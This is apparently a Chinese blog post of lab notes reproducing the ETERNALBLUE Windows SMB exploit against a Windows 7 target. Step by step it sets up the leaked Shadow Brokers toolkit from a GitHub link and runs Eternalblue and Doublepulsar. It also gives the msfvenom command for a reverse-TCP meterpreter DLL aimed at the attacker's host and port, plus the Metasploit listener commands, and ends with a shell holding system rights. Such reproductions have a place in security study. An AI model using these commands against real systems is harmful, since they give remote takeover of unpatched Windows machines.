方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记

0x01  环境搭建

  1. win2003 攻击机,ip:192.168.0.28
  2. kali 攻击机,ip:192.168.0.27
  3. win7 靶机,ip:192.168.0.14;netstat -an 查看端口开发情况,确保445端口开启方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第1张图片
  4. 另外:win2003攻击机需要有python环境,安装python-2.6.6.msi,pywin32-221.win32-py2.6.exe,安装过程不再赘述,安装完成修改系统变量即可。方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第2张图片
  5. 方程式ETERNALBLUE 下载地址:https://codeload.github.com/misterch0c/shadowbroker/zip/master;下载解压后将其中windows目录的所有文件拷贝之win2003系统中。
  6. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第3张图片
  7. 在该windows目录下建立一个文件夹为:listeningposts;与fb.py文件中的一致方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第4张图片

0x02  测试过程

  1. 进入windows目录。执行python fb.py,设置目标IP与本机IP,重定向选择No;这里由于我的虚拟机没有D盘,所以修改logs文件目录到C盘。
  2. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第5张图片
  3. 根据提示,输入0创建一个新的项目,项目名为test
  4. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第6张图片
  5. 接下来使用use Eternalblue,一路回车:
  6. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第7张图片
  7. 这里要注意,根据提示选项,这里选择1,然后继续一路回车
  8. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第8张图片方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第9张图片
  9. 在kali系统中,利用msf生成一个dll劫持文件,并将s.dll文件拷贝到windows2003的C盘目录下:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.27 LPORT=5555 -f dll > /opt/s.dll方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第10张图片

  10. 在msf下开启msfpaylod监听:

    use exploit/multi/handler

    set lhost 192.168.0.27

    set lport 5555

    set PAYLOAD windows/x64/meterpreter/reverse_tcp

    exploit

    方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第11张图片
  11. 接下来继续在windows2003上执行use Doublepulsar
  12. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第12张图片
  13. 根据提示选择对应系统,运行dll文件,设置dll文件路径
  14. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第13张图片方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第14张图片
  15. 最后在MSF中可以看到,成功反弹shell,拿到系统权限。方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记_第15张图片

0x03  参考文档

  • TOOLS文章:http://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==&mid=2650374058&idx=1&sn=2ac09acae4fe70ca80446c3385feb90c&chksm=beb07c1689c7f500cad4fb3f8e2e76f31220b569ef3617e440dacb6cbe646958065ec9493f37&mpshare=1&scene=23&srcid=0416plWIdYQXxZ61ZUEd2foy#rd
  • 边界安全文章:http://mp.weixin.qq.com/s?__biz=MzI0MzQyNzI2OA==&mid=2247484335&idx=1&sn=b5ad15e967aa13a729ee3c5890320038&chksm=e96c7104de1bf81216500f50a62a335579916b32d7ccf8b94402922fa97bb005faceea876b52&mpshare=1&scene=23&srcid=0416ztWMmZGOSUjFbBMED29b#rd

你可能感兴趣的:(漏洞复现)